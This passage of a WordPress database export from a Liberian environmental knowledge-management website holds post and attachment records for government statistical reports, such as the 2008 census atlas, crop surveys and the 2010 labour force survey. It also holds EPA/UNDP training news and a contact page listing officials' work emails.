charts.\r\nData Collection\r\nDue to the civil war, Liberia did not conduct the 1994 and 2004 rounds of censuses. However, on April 21, 2007, the 52nd National Legislature enacted the law\r\nempowering the Executive Branch of Government to conduct Liberia’s fourth census in March 2008. The population and housing census was conducted on March\r\n28, 2008 and data collection lasted for a period of ten days.\r\nThe aim of the enumeration was to take a count of all persons who were within the border of Liberia by midnight of March 20th (Census Night). Enumeration started\r\non March 21st including the canvassing of institutional and floating populations. The completed questionnaires/schedules were assembled at the divisional census\r\noffices for quick checks and validation, such that all cases which required call backs, were attended before the questionnaires were finally dispatched to Monrovia.','2008 Census Atlas Report','','publish','closed','closed','','2008-census-atlas-report','','','2021-08-23 10:54:49','2021-08-23 10:54:49','',0,'https://ekmsliberia.info/?post_type=document&#038;p=3102',121,'document','',0),(3103,38,'2020-07-15 21:19:16','2020-07-15 21:19:16','The Liberia Institute of Statistics and Geo-Information Services (LISGIS), has published the 2008 Census results in different reports at\ndifferent times and with varying degrees of detail. This has culminated in the production of the first Census Atlas for Liberia. It has involved\nextensive consultations and collaboration between the International staff on one hand, and GIS/Cartography Division and other professional\nstaff of LISGIS, on the other hand. It is also worth mentioning that UNFPA provided technical and financial support for the production of this\nfirst Census Atlas. ','2008 Census Atlas','LIBERIA INSTITUTE OF STATISTICS AND GEO-INFORMATION SERVICES (LISGIS)','inherit','open','closed','','2008-census-atlas','','','2020-07-15 21:20:54','2020-07-15 21:20:54','',3102,'https://ekmsliberia.info/wp-content/uploads/2020/07/2008-Census-Atlas.pdf',0,'attachment','application/pdf',0),(3104,38,'2020-07-15 21:40:19','2020-07-15 21:40:19','Statistical information on agricultural production, prices and market conditions play a central role in the Liberian economy in terms of contribution to income generation, employment and food security for most families. This is precisely why the Ministry of Agriculture (MOA) in collaboration with Liberia Institute of Statistics and GeoInformation Services (LISGIS) exerted significant efforts to revive the activities of agricultural survey. This summary provides an insight into all major components of the 2008 agricultural survey results. The document highlights major characteristics of agricultural activities including production of food crops and livestock.\r\n\r\n<strong>Objective</strong>\r\nThe overall objective of the publication is to provide statistics on food and agriculture for effective planning and the monitoring of agricultural sector for policy and administrative decisions.\r\n\r\n<strong>Main Source of Data</strong>\r\nThe main source of data for the publication was the 2008 agricultural sample survey which used the conventional method with a well-prepared questionnaire.\r\n\r\n<strong>Methodology</strong>\r\nThe sample design for the 2008 survey was a multi-stage sampling with: (a) Enumeration Areas (EAs) as the primary sampling units (PSUs), (b) Agricultural Holders (Ahs) within EA as the secondary sampling units (SSUs), (c) Holders’ Rice Farms (HRFs) as the tertiary sampling unit, and (d) Experimental plots for crop-cutting in selected farms as the ultimate stage-sampling unit. The sampling design was adopted\r\nwith each county as domain of study. Three (3) sets of questionnaires were developed and administered, namely: Households\r\nlisting questionnaire, Holders’ questionnaire and Field and Yields measurement questionnaires. These questionnaires were used to probe only those households with member participating in agricultural activities. Each completed questionnaire was\r\nscrutinized in the field and further scrutiny was done in the central office. Range and internal consistency checks were adopted.\r\n\r\n&nbsp;','PRODUCTION ESTIMATES OF MAJOR CROPS AND ANIMALS – 2008 REPORT','','publish','closed','closed','','production-estimates-of-major-crops-and-animals-2008-report','','','2021-08-23 10:58:09','2021-08-23 10:58:09','',0,'https://ekmsliberia.info/?post_type=document&#038;p=3104',122,'document','',0),(3105,38,'2020-07-15 21:36:06','2020-07-15 21:36:06','Statistical information on agricultural production, prices and market conditions play a\ncentral role in the Liberian economy in terms of contribution to income generation,\nemployment and food security for most families. This is precisely why the Ministry of\nAgriculture (MOA) in collaboration with Liberia Institute of Statistics and GeoInformation Services (LISGIS) exerted significant efforts to revive the activities of\nagricultural survey. This summary provides an insight into all major components of the\n2008 agricultural survey results. The document highlights major characteristics of\nagricultural activities including production of food crops and livestock. \n','2008-2009 CROP ASSESSMENT REPORT','Ministry of Agriculture (MOA)\nLiberia Institute of Statistics & Geo-information Services (LISGIS)\nUnited Nations Food and Agriculture Organization (FAO)\nCatholic Relief Services (CRS)\nSamaritan Purse','inherit','open','closed','','2008-2009-crop-assessment-report','','','2020-07-15 21:37:14','2020-07-15 21:37:14','',3104,'https://ekmsliberia.info/wp-content/uploads/2020/07/2008-2009-CROP-ASSESSMENT-REPORT.pdf',0,'attachment','application/pdf',0),(3106,38,'2020-07-15 21:40:35','2020-07-15 21:40:35','Statistical information on agricultural production, prices and market conditions play a central role in the Liberian economy in terms of contribution to income generation, employment and food security for most families. This is precisely why the Ministry of Agriculture (MOA) in collaboration with Liberia Institute of Statistics and GeoInformation Services (LISGIS) exerted significant efforts to revive the activities of agricultural survey. This summary provides an insight into all major components of the 2008 agricultural survey results. The document highlights major characteristics of agricultural activities including production of food crops and livestock.\n\n<strong>Objective</strong>\nThe overall objective of the publication is to provide statistics on food and agriculture for effective planning and the monitoring of agricultural sector for policy and administrative decisions.\n\n<strong>Main Source of Data</strong>\nThe main source of data for the publication was the 2008 agricultural sample survey which used the conventional method with a well-prepared questionnaire.\n\n<strong>Methodology</strong>\nThe sample design for the 2008 survey was a multi-stage sampling with: (a) Enumeration Areas (EAs) as the primary sampling units (PSUs), (b) Agricultural Holders (Ahs) within EA as the secondary sampling units (SSUs), (c) Holders’ Rice Farms (HRFs) as the tertiary sampling unit, and (d) Experimental plots for crop-cutting in selected farms as the ultimate stage-sampling unit. The sampling design was adopted\nwith each county as domain of study. Three (3) sets of questionnaires were developed and administered, namely: Households\nlisting questionnaire, Holders’ questionnaire and Field and Yields measurement questionnaires. These questionnaires were used to probe only those households with member participating in agricultural activities. Each completed questionnaire was\nscrutinized in the field and further scrutiny was done in the central office. Range and internal consistency checks were adopted.\n\n&nbsp;','PRODUCTION ESTIMATES OF MAJOR CROPS AND ANIMALS – 2008 REPORT','','inherit','closed','closed','','3104-autosave-v1','','','2020-07-15 21:40:35','2020-07-15 21:40:35','',3104,'https://ekmsliberia.info/3104-autosave-v1/',0,'revision','',0),(3107,38,'2020-07-15 22:05:58','2020-07-15 22:05:58','This report presents the main results of the Liberia Labour Force Survey 2010. The survey was conducted jointly by the Ministry of Labour and the Liberia Institute of Statistics and Geo‐Information Services (LISGIS), and the fieldwork took place over a three‐month period from February to May 2010. Technical support was provided by the International Labour Office. This survey report is based on data collected from 6233 households in 523 enumeration areas spread around the country. Socio‐demographic information was collected from about 32,000 household members, and more detailed information on each person’s economic activity was collected from about 25,000 household members aged 5 and over. Most of the data presented in this LFS report relates to the population aged 15 and over, and is based on data collected from about 17,000 individuals. In an effort to have a larger sample for this survey, and to make government data collection more efficient, fieldwork for this survey was combined with the fieldwork for the Core Welfare Indicators Questionnaire (CWIQ) survey and with another survey module on human rights. As a result, the larger sample allows for estimates to be made down to the county level, which had not been possible on previous surveys such as CWIQ 2007 and DHS 2007. According to the survey data, it is estimated that the number of people aged 15 and over in each activity status is as shown in the table below:','Report on the Liberia Labour Force Survey 2010','','publish','closed','closed','','report-on-the-liberia-labour-force-survey-2010','','','2021-08-25 10:58:02','2021-08-25 10:58:02','',0,'https://ekmsliberia.info/?post_type=document&#038;p=3107',123,'document','',0),(3108,38,'2020-07-15 22:01:39','2020-07-15 22:01:39','This report presents the main results of the Liberia Labour Force Survey 2010. The survey was\nconducted jointly by the Ministry of Labour and the Liberia Institute of Statistics and Geo‐Information\nServices (LISGIS), and the fieldwork took place over a three‐month period from February to May 2010.\nTechnical support was provided by the International Labour Office','2010 Labour Force Report','Liberian Institute of Statistics and           Ministry of Labour\nGeo‐Information Services (LISGIS)           Monrovia','inherit','open','closed','','2010-labour-force-report','','','2020-07-15 22:03:48','2020-07-15 22:03:48','',3107,'https://ekmsliberia.info/wp-content/uploads/2020/07/2010-Labour-Force-Report.pdf',0,'attachment','application/pdf',0),(3109,38,'2020-07-15 22:30:01','2020-07-15 22:30:01','This Annual Report represents activities of the Ministry of Agriculture for the year 2006 in support of Government’s effort to restore productive capacities in the agricultural sector. Because of its strategic role for employment creation, poverty reduction, food security and income generation, the Ministry prepared an interim policy document as a precursor for the formulation and promulgation of a Comprehensive Agricultural Development Policy and a National Agricultural Investment Strategy. With funding from the current fiscal budget, which was increased by over 250% from a five-year outlay of less than US$1 million to over US$3.2 million, the Ministry, among other things, began rehabilitating the Central Agricultural Research Institute (CARI) located in Bong County. As a result, nine New Rice of Africa (NERICA) varieties and four high yielding local varieties are under multiplication at CARI. Additionally, 19 elite IITA cassava cultivars are being multiplied at CARI and 241 IITA cassava genotypes are undergoing testing at CARI and in six other counties. Similarly, the Ministry began reactivating the national extension system, providing assistance to local initiatives such as the Kpein Seed Multiplication Project in Nimba County. While contributing to food security and poverty alleviation, these efforts are also helping reestablish government’s presence and visibility throughout the country.','Ministry of Agriculture ANNUAL REPORT 2006','','publish','closed','closed','','ministry-of-agriculture-annual-report-2006','','','2022-12-06 11:12:43','2022-12-06 11:12:43','',0,'https://ekmsliberia.info/?post_type=document&#038;p=3109',119,'document','',0),(3110,38,'2020-07-15 22:25:51','2020-07-15 22:25:51','This Annual Report represents activities\nof the Ministry of Agriculture for the year\n2006 in support of Government’s effort to\nrestore productive capacities in the\nagricultural sector. ','2006 MOA Annual Report_1','MOA','inherit','open','closed','','2006-moa-annual-report_1','','','2020-07-15 22:26:42','2020-07-15 22:26:42','',3109,'https://ekmsliberia.info/wp-content/uploads/2020/07/2006-MOA-Annual-Report_1.pdf',0,'attachment','application/pdf',0),(3111,38,'2020-07-15 22:33:52','2020-07-15 22:33:52','','FFI LOGO','FFI','inherit','open','closed','','ffi-logo','','','2020-07-15 22:34:35','2020-07-15 22:34:35','',1614,'https://ekmsliberia.info/wp-content/uploads/2019/11/FFI-LOGO.jpg',0,'attachment','image/jpeg',0),(3117,38,'2020-08-21 11:20:17','2020-08-21 11:20:17','<!-- wp:paragraph -->\n<p>\n\nAmidst the wanton and willful abuse of the environment, the Environmental Protection Agency of Liberia (EPA) in collaboration with the United Nations Development Program (UNDP) on Monday, August 17, 2020 commenced a two -day technical gender participatory training for environmental inspectors, environmental focal points from line ministries and agencies on the general concepts of environmental monitoring, awareness, climate change, stakeholders’ engagement, environmental management and compliance.The training which is on-going in Gbarnga, Bong County is being held under the auspices of the Cross Cutting Capacity Development (CCCD) Project funded by the Global Environmental Facility (GEF) Trust Fund or Least Developed Country Fund (LDCF), the United Nations Development (UNDP) TRAC resources. The Government of Liberia through the Ministry of Finance and Development Planning is co-supporting the workshop.The first day of the training attracted several experts who covered various topics including ‘The Mandates and Functions of EPA’, the ‘Roles and Responsibilities of Environmental Officers: Powers and Duties of Environmental Inspectors’, ‘Environmental Social Impact Assessment: An overview of the Environmental Protection Standards Guidelines and Procedures’, ‘Harmful Environmental practices: Enforcement and Control Right’ and Responsibility to a Clean and Healthy Environment’.Other topics considered included ‘Mainstreaming gender in environmental compliance and management and ‘challenges, barriers and way forward to institutional coordination in Liberia’.The training seeks to build and enhance knowledge on the mandates and roles of the EPA, improve knowledge on environmental management and climate change, gain knowledge on harmful environmental practices and improve the skills of participants on how to carryout environmental monitoring, awareness and reporting.The training is being held under the theme: ‘Environmental sustainability through compliance and monitoring’.\n\n</p>\n<!-- /wp:paragraph -->','Inspectors Get Extra Training …To Curb Environmental Abuses','','publish','open','open','','inspectors-get-extra-training-to-curb-environmental-abuses','','','2020-08-25 18:54:43','2020-08-25 18:54:43','',0,'https://ekmsliberia.info/?p=3117',192,'post','',0),(3118,38,'2020-08-21 11:19:41','2020-08-21 11:19:41','','ekms','epa','inherit','open','closed','','ekms-2','','','2020-08-21 11:20:01','2020-08-21 11:20:01','',3117,'https://ekmsliberia.info/wp-content/uploads/2020/08/ekms.jpg',0,'attachment','image/jpeg',0),(3119,38,'2020-08-21 11:20:17','2020-08-21 11:20:17','<!-- wp:paragraph -->\n<p>\n\nAmidst the wanton and willful abuse of the environment, the Environmental Protection Agency of Liberia (EPA) in collaboration with the United Nations Development Program (UNDP) on Monday, August 17, 2020 commenced a two -day technical gender participatory training for environmental inspectors, environmental focal points from line ministries and agencies on the general concepts of environmental monitoring, awareness, climate change, stakeholders’ engagement, environmental management and compliance.The training which is on-going in Gbarnga, Bong County is being held under the auspices of the Cross Cutting Capacity Development (CCCD) Project funded by the Global Environmental Facility (GEF) Trust Fund or Least Developed Country Fund (LDCF), the United Nations Development (UNDP) TRAC resources. The Government of Liberia through the Ministry of Finance and Development Planning is co-supporting the workshop.The first day of the training attracted several experts who covered various topics including ‘The Mandates and Functions of EPA’, the ‘Roles and Responsibilities of Environmental Officers: Powers and Duties of Environmental Inspectors’, ‘Environmental Social Impact Assessment: An overview of the Environmental Protection Standards Guidelines and Procedures’, ‘Harmful Environmental practices: Enforcement and Control Right’ and Responsibility to a Clean and Healthy Environment’.Other topics considered included ‘Mainstreaming gender in environmental compliance and management and ‘challenges, barriers and way forward to institutional coordination in Liberia’.The training seeks to build and enhance knowledge on the mandates and roles of the EPA, improve knowledge on environmental management and climate change, gain knowledge on harmful environmental practices and improve the skills of participants on how to carryout environmental monitoring, awareness and reporting.The training is being held under the theme: ‘Environmental sustainability through compliance and monitoring’.\n\n</p>\n<!-- /wp:paragraph -->','Inspectors Get Extra Training …To Curb Environmental Abuses','','inherit','closed','closed','','3117-revision-v1','','','2020-08-21 11:20:17','2020-08-21 11:20:17','',3117,'https://ekmsliberia.info/3117-revision-v1/',0,'revision','',0),(3124,42,'2020-08-25 14:42:53','2020-08-25 14:42:53','<!-- wp:paragraph -->\n<p>\n\nThe Environmental Protection Agency and the United Nations Development Program (UNDP) on Thursday, August 20, 2020 commenced a two-day training for female journalists to improve environmental awareness and reporting on the value of Rio Conventions and other Multilateral Environmental Agreements (MEA).The training which is being held under the theme: “Strengthening national capacities to meet global environmental obligations with the framework of sustainable development priorities” attracts female reporters across the country.It is being held under the auspices of the Cross-Cutting Capacity Development (CCCD) Project with funding from Global Environmental Facility (GEF). It’s taking place in Ganta, Nimba County.\n\n</p>\n<!-- /wp:paragraph -->','EPA and UNDP Host a Two-Day Training for Female Journalists','','publish','open','open','','epa-and-undp-host-a-two-day-training-for-female-journalists','','','2020-08-25 14:42:55','2020-08-25 14:42:55','',0,'https://ekmsliberia.info/?p=3124',191,'post','',0),(3125,42,'2020-08-25 14:39:33','2020-08-25 14:39:33','','117999801_638497756792008_4036954288064851198_o','','inherit','open','closed','','117999801_638497756792008_4036954288064851198_o','','','2020-08-25 14:39:33','2020-08-25 14:39:33','',3124,'https://ekmsliberia.info/wp-content/uploads/2020/08/117999801_638497756792008_4036954288064851198_o.jpg',0,'attachment','image/jpeg',0),(3126,42,'2020-08-25 14:39:49','2020-08-25 14:39:49','<!-- wp:paragraph -->\n<p>\n\nThe Environmental Protection Agency and the United Nations Development Program (UNDP) on Thursday, August 20, 2020 commenced a two-day training for female journalists to improve environmental awareness and reporting on the value of Rio Conventions and other Multilateral Environmental Agreements (MEA).The training which is being held under the theme: “Strengthening national capacities to meet global environmental obligations with the framework of sustainable development priorities” attracts female reporters across the country.It is being held under the auspices of the Cross-Cutting Capacity Development (CCCD) Project with funding from Global Environmental Facility (GEF). It’s taking place in Ganta, Nimba County.\n\n</p>\n<!-- /wp:paragraph -->','EPA and UNDP Host a Two-Day Training for Female Journalists','','inherit','closed','closed','','3124-revision-v1','','','2020-08-25 14:39:49','2020-08-25 14:39:49','',3124,'https://ekmsliberia.info/3124-revision-v1/',0,'revision','',0),(3127,42,'2020-08-25 14:48:24','2020-08-25 14:48:24','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency of Liberia in collaboration with the United Nations Development Program (UNDP) with funding from the Global Environment Facility (GEF) on Tuesday, August 25, 2020 commenced a week-long Cross-Cutting Capacity Development (CCCD) ‘learning by doing’ training in Buchanan, Grand Bassa County on how to use the Environmental Knowledge Management System (EKMS). The training which attracts IT Specialists from line Government of Liberia ministries and agencies would also look at the management of existing and new data and information through the EKMS to demonstrate its value at improving a more holistic and resilient construct of the selected sectorial plan in keeping with RIO Convention obligations. The EKMS was built to store environmental data. </p>\n<!-- /wp:paragraph -->','EPA and UNDP Host a Week-Long EKMS Learning-By-Doing Training for IT Specialists','','publish','open','open','','epa-and-undp-host-a-week-long-ekms-learning-by-doing-training-for-it-specialists','','','2020-08-25 14:48:26','2020-08-25 14:48:26','',0,'https://ekmsliberia.info/?p=3127',188,'post','',0),(3129,42,'2020-08-25 14:46:35','2020-08-25 14:46:35','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency of Liberia in collaboration with the United Nations Development Program (UNDP) with funding from the Global Environment Facility (GEF) on Tuesday, August 25, 2020 commenced a week-long Cross-Cutting Capacity Development (CCCD) ‘learning by doing’ training in Buchanan, Grand Bassa County on how to use the Environmental Knowledge Management System (EKMS). The training which attracts IT Specialists from line Government of Liberia ministries and agencies would also look at the management of existing and new data and information through the EKMS to demonstrate its value at improving a more holistic and resilient construct of the selected sectorial plan in keeping with RIO Convention obligations. The EKMS was built to store environmental data. </p>\n<!-- /wp:paragraph -->','EPA and UNDP Host a Week-Long EKMS Learning-By-Doing Training for IT Specialists','','inherit','closed','closed','','3127-revision-v1','','','2020-08-25 14:46:35','2020-08-25 14:46:35','',3127,'https://ekmsliberia.info/3127-revision-v1/',0,'revision','',0),(3130,42,'2020-08-25 14:47:28','2020-08-25 14:47:28','','118265702_641907606451023_8403732740422242380_o','','inherit','open','closed','','118265702_641907606451023_8403732740422242380_o','','','2020-08-25 14:47:28','2020-08-25 14:47:28','',3127,'https://ekmsliberia.info/wp-content/uploads/2020/08/118265702_641907606451023_8403732740422242380_o.jpg',0,'attachment','image/jpeg',0),(3136,42,'2020-08-28 11:18:46','2020-08-28 11:18:46','<!-- wp:paragraph -->\n<p><strong>Monrovia, Liberia -&nbsp;&nbsp;</strong>As a means of ensuring that Liberian owned companies fully participate in the country’s ongoing offshore petroleum licensing round, the Liberia Petroleum Regulatory Authority (LPRA) on Friday, June 5, 2020, held a meeting with representatives of the Liberia Business Association (LIBA), Liberia Chambers of Commerce (LCC) and the Patriotic Entrepreneurs of Liberia (PATEL) to fully explain the processes and relevance of Liberian companies participating in the licensing round.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>During the meeting, the LPRA Director-General, Hon. Archie Donmo, stressed the significance of Liberian companies participating in the petroleum sector and pointed out, “I encourage everyone to take advantage of this tremendous opportunity which is potentially one of the means of promoting private sector growth in this county.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Participating institutions of the meeting lauded the LPRA for the initiative and expressed interest in working with the Authority in ensuring that Liberian companies are fully involved in the petroleum sector particularly during the 2020 offshore licensing round.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The decision to incorporate Liberian companies in the 2020 offshore licensing round is hinged on the President’s that “Liberians will not be spectators in their own economy.” It is further based on the indigenization mandate by the Government of Liberia as required in section 36(a) of the Amended Petroleum Law of Liberia which sets aside a mandatory 5% interest in all petroleum agreements to companies owned by natural persons of Liberian citizenship. To facilitate the enforcement of this provision, LPRA is conducting pre-qualification of Liberia companies and has issued a request for expression of interest.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The pre-qualification process which started March 17, 2020, was scheduled to end June 30, 2020. However, due to an appeal from the Liberian business community (LCC, LIBA, PATEL) and in consideration of the state of emergency as a result of the Covid-19, the Authority has extended the deadline for expression of interest to<strong>&nbsp;July 31, 2020</strong>.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Meanwhile, &nbsp;a Q&amp;A zoom meeting is scheduled to be held on Friday, June 12 at which time Liberian companies interested in participating in the ongoing licensing round will be given the opportunity to ask the necessary questions relating to the bid round. LPRA encourages Liberian companies to take advantage of this opportunity and position themselves as partners in the quest for hydrocarbon resources.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Nine offshore blocks in the Harper Basin are being tendered during the licensing round. This region represents Liberia\'s most prospective geological regions and the only unexplored and undrilled region in West Africa Transformed Margin.&nbsp;The 2020 Liberia Offshore Licensing Round runs from April 10, 2020-February 28, 2021.&nbsp;</p>\n<!-- /wp:paragraph -->','Government intensifies campaign for Indigenization in the Oil and Gas Sector','','inherit','closed','closed','','3072-revision-v1','','','2020-08-28 11:18:46','2020-08-28 11:18:46','',3072,'https://ekmsliberia.info/3072-revision-v1/',0,'revision','',0),(3141,38,'2020-09-30 10:27:56','2020-09-30 10:27:56','A baseline study is a pivotal activity in implementing any developmental programme. It is usually\nthe basis of many projects from planning to implementation and evaluation. The results and\nfindings of a baseline study are a rich resource for specific issues targeted in the projects.','Baseline-Study-Report-FINAL-12.11.13','WASH','inherit','open','closed','','baseline-study-report-final-12-11-13','','','2020-09-30 10:28:49','2020-09-30 10:28:49','',0,'https://ekmsliberia.info/wp-content/uploads/2020/09/Baseline-Study-Report-FINAL-12.11.13.pdf',0,'attachment','application/pdf',0),(3143,38,'2020-09-30 10:39:57','2020-09-30 10:39:57','Many years before 2007, the implementation of water, sanitation and hygiene activities\nwas un-guided by standards, with the main implementer being the public sector. At the\nsame time technology options were equally limited, whereas hygiene issues were at\ntheir lowest ebb. Much has transpired with more technology options, the involvement of\nprivate and non-governmental organizations leading the implementation of WASH\nactivities.','Guidelines-for-Water-and-Sanitation-Services-in-Liberia','WASH,MPW','inherit','open','closed','','guidelines-for-water-and-sanitation-services-in-liberia','','','2020-09-30 10:40:49','2020-09-30 10:40:49','',0,'https://ekmsliberia.info/wp-content/uploads/2020/09/Guidelines-for-Water-and-Sanitation-Services-in-Liberia.pdf',0,'attachment','application/pdf',0),(3145,38,'2020-09-30 10:49:45','2020-09-30 10:49:45','Many years before 2007, the implementation of water, sanitation and hygiene activities\nwas un-guided by standards, with the main implementer being the public sector. At the\nsame time technology options were equally limited, whereas hygiene issues were at\ntheir lowest ebb. Much has transpired with more technology options, the involvement of\nprivate and non-governmental organizations leading the implementation of WASH\nactivities.\nThis should in its true application place more authority in the hands of the public\ninstitutions to leverage resources into monitoring, supervision and evaluation. In order\nto perform this important role, standards need to be established and agreed upon for\neffective monitoring and enforcement for the good of the Liberian population. Such\nstandards must exhibit best practices and be state of the art.\nIn 1999, the first of any attempt to organize standards to govern WASH activities were\nintroduced into the sector. These were later modified in 2004, with mere considerations\non alternative designs for sanitation facilities without recommending additional options\nfor facilities. ','Guidelines-for-Water-and-Sanitation-Services-in-Liberia','WASH,MPW','inherit','open','closed','','guidelines-for-water-and-sanitation-services-in-liberia-2','','','2020-09-30 10:50:49','2020-09-30 10:50:49','',0,'https://ekmsliberia.info/wp-content/uploads/2020/09/Guidelines-for-Water-and-Sanitation-Services-in-Liberia-1.pdf',0,'attachment','application/pdf',0),(3147,38,'2020-09-30 11:11:52','2020-09-30 11:11:52','The Government of Liberia (GOL) conducted the Third Annual Water, Sanitation and\nHygiene (WASH) Joint Sector Review (JSR) from 15 – 16 July 2015 at the Administrative\nBuilding in Gbarnga, Bong County. The National Water, Sanitation and Hygiene\nPromotion Committee (NWSHPC) spearheaded the event with support from the ministries\nof Public Works (MPW), Health (MOH), Lands, Mines and Energy (MLME) including Liberia\nWater and Sewer Corporation (LWSC) and Monrovia City Corporation (MCC) along with\npartners. A total of one hundred and seventy one (171) invitees came from the various\nWASH ministries and agencies, as well as donors, Non-Governmental Organizations\n(NGOs), and Civil Society Organizations (CSOs) at national and county levels. ','JSR-III-Event-Report','WASH','inherit','open','closed','','jsr-iii-event-report','','','2020-09-30 11:12:51','2020-09-30 11:12:51','',0,'https://ekmsliberia.info/wp-content/uploads/2020/09/JSR-III-Event-Report.pdf',0,'attachment','application/pdf',0),(3149,38,'2020-09-30 11:28:14','2020-09-30 11:28:14','','Liberia-WASH-Cluster-Newsletter-Issue-1-Nov-2014','','inherit','open','closed','','liberia-wash-cluster-newsletter-issue-1-nov-2014','','','2020-09-30 11:28:14','2020-09-30 11:28:14','',0,'https://ekmsliberia.info/wp-content/uploads/2020/09/Liberia-WASH-Cluster-Newsletter-Issue-1-Nov-2014.pdf',0,'attachment','application/pdf',0),(3150,38,'2020-09-30 11:35:42','2020-09-30 11:35:42','','Liberia-WASH-Cluster-Newsletter-Issue-1-Nov-2014','','inherit','open','closed','','liberia-wash-cluster-newsletter-issue-1-nov-2014-2','','','2020-09-30 11:35:42','2020-09-30 11:35:42','',0,'https://ekmsliberia.info/wp-content/uploads/2020/09/Liberia-WASH-Cluster-Newsletter-Issue-1-Nov-2014-1.pdf',0,'attachment','application/pdf',0),(3152,38,'2020-09-30 12:10:21','2020-09-30 12:10:21','','National Policy and Response Strategy on Climate Change Final Document-min_0','EPA','inherit','open','closed','','national-policy-and-response-strategy-on-climate-change-final-document-min_0','','','2020-09-30 12:10:31','2020-09-30 12:10:31','',0,'https://ekmsliberia.info/wp-content/uploads/2020/09/National-Policy-and-Response-Strategy-on-Climate-Change-Final-Document-min_0.pdf',0,'attachment','application/pdf',0),(3154,42,'2020-10-12 12:25:10','2020-10-12 12:25:10','<h2>Contact Us</h2>\nPlease contact the EKMS Team for further information relating to this website.\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:\n\n[everest_form id=\"2889\"]\n<h2>EKMS Knowledge Brokers</h2>\nContact  our knowledge brokers for direct support or response to your questions:\n<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\">								</a><figcaption>J.S. Datuama Cammue</figcaption></figure>\n<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\">								</a>\n\n<figcaption>Benjamin Karmorh</figcaption></figure>\n<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"Berexford S. Jallah\" alt=\"Berexford S. Jallah\">								</a>\n\n<figcaption>Berexford S. Jallah</figcaption></figure>\nMEAs Officer/UNCBD Focal Point\njcammue@epa.gov.lr\n\nMEAs Coordinator/UNFCCC Focal Point\nbkarmorh@epa.gov.lr\n\nGIS Coordinator/UNCCD Focal Point\nbjallah@epa.gov.lr\n<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\">								</a>\n\n<figcaption>John K. Jallah</figcaption></figure>\n<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\">								</a>\n\n<figcaption>Kawusu Toure</figcaption></figure>\n<strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a>\n\nManager - Compliance and Enforcement, EPA\njjallah@epa.gov.lr\n\nAssistant Manager - Compliance and Enforcement, ESIA, EPA\nkawumtoure@gmail.com\n\n<strong>Konikay Nimely</strong>\nEIA Manager, FDA\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a>\n\n<strong>Edward S. Kamara</strong>\nMarketing and Forest Forecast\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong>\nConservation Manager, FDA\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong>\nDirector @ MOA\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong>\nAssistant Minister, MME\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong>\nLand Use Management Manager, LLA\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong>\nManager, CCCD Project\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2020-10-12 12:25:10','2020-10-12 12:25:10','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3156,42,'2020-10-12 15:37:35','2020-10-12 15:37:35','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h2>EKMS Knowledge Brokers</h2>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n				